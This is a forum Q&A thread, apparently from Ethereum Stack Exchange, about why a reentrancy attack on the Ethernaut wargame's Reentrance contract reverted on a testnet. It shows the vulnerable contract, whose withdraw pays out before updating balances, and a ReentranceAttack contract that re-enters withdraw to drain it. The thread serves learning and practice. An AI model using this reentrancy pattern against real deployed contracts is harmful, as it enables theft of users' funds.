# Reentrance attack execution reverted

Tags: solidity, security, reentrant-attacks

I am working on ethernaut reentrancy problem
Any clue why this transaction did not work ? Thanks

https://mumbai.polygonscan.com/tx/0x69c19a7d14449cc5396e31d63db2c0d622acc48777592a5c423380f755d48fd0

Attack contract
PS: I send a small amount to trigger the attack (with receive function)

```
// SPDX-License-Identifier: MIT
// 0xF9D62c7fcad516f0c07f6bBd9d071C4D3C6f428A
pragma solidity ^0.8.0;

library SafeMath {
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        assert(c / a == b);
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // assert(b > 0); // Solidity automatically throws when dividing by 0
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        assert(b <= a);
        return a - b;
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        assert(c >= a);
        return c;
    }
}

contract Reentrance {
  
  using SafeMath for uint256;
  mapping(address => uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call{value:_amount}("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  receive() external payable {}
}

contract ReentranceAttack {
    Reentrance _targetContract;
    uint _amount;

    constructor(address targetContract, uint amount) payable {
        _targetContract = Reentrance(payable(targetContract));
        _amount = amount;
        _targetContract.donate{value: amount}(address(this));
    }
    
    receive() external payable {
        if(address(_targetContract).balance >= _amount) {
            _targetContract.withdraw(_amount);
        }
    }
}
```

[image: maybe a hint]

Comment: Share your code so we can help you

Comment: thanks for reply.post updated

Answer (score 0):

You never call the withdraw function.

You call donate in the constructor and have a withdraw call in your receive function to perform the reentrancy, so that's great, but you don't have an 'attack' function that will call the withdraw function for the first time and start the reentrancy hack.

So the reentrancy is never performed

Comment: I trigger this by sending a small amount of wei to the ReentrancyAttack contract which in turn will trigger the withdraw function- by exectuing the code in the receive function

Comment: Also, based on your argument this should'nt cause the transaction to revert